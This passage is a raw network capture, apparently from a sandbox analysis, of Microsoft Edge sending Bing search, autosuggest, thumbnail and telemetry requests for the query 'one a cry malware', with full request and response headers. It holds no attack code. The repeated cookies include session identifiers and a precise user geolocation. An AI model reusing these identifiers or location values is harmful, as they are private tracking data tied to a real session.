cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2812
date: Thu, 17 Oct 2024 21:04:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a662
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=on&cp=2&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=on&cp=2&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1369
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bca94714c07a79526b8a41afa71
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ak/hgZqbNihiXxXl62tcNbKTWdFCtyd8Ij1E12CDg88='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:10 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a664
GET

https://www.bing.com/th?id=OSK.bOszbVMd5kfD7ie57EC0sHFxj9Ho2-xVyz4sp0hiAtQ&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.bOszbVMd5kfD7ie57EC0sHFxj9Ho2-xVyz4sp0hiAtQ&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3546
date: Thu, 17 Oct 2024 21:04:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a747
GET

https://www.bing.com/th?id=OSK.72659458a0c565596470540b61ad789d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.72659458a0c565596470540b61ad789d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2389
date: Thu, 17 Oct 2024 21:04:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a748
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=o&cp=1&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=o&cp=1&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a739
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%2Ci%3A12%2Cig%3ABB4F38DB476D49928762B233271DDA93%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049216%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%22%2C%22AsResponseLength%22%3A%221114%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049306%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%2Cig%3A244DD8242813486A885D92B7CD7DA8A9%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049306%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A15%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049324%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049351%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A16%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049410%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%22%2C%22AsResponseLength%22%3A%221363%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049434%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%2Cig%3A0A73B6303374410690C530BB155DA5D6%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049434%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A17%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049538%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%2Ci%3A12%2Cig%3ABB4F38DB476D49928762B233271DDA93%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049216%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%22%2C%22AsResponseLength%22%3A%221114%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049306%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%2Cig%3A244DD8242813486A885D92B7CD7DA8A9%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049306%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A15%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049324%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049351%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A16%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049410%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%22%2C%22AsResponseLength%22%3A%221363%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049434%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aon%2Ci%3A14%2Cig%3A0A73B6303374410690C530BB155DA5D6%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049434%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ao%2Ci%3A15%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3A%2Ci%3A17%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049538%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 877
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcaa144479daab338e8e810f1e6
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
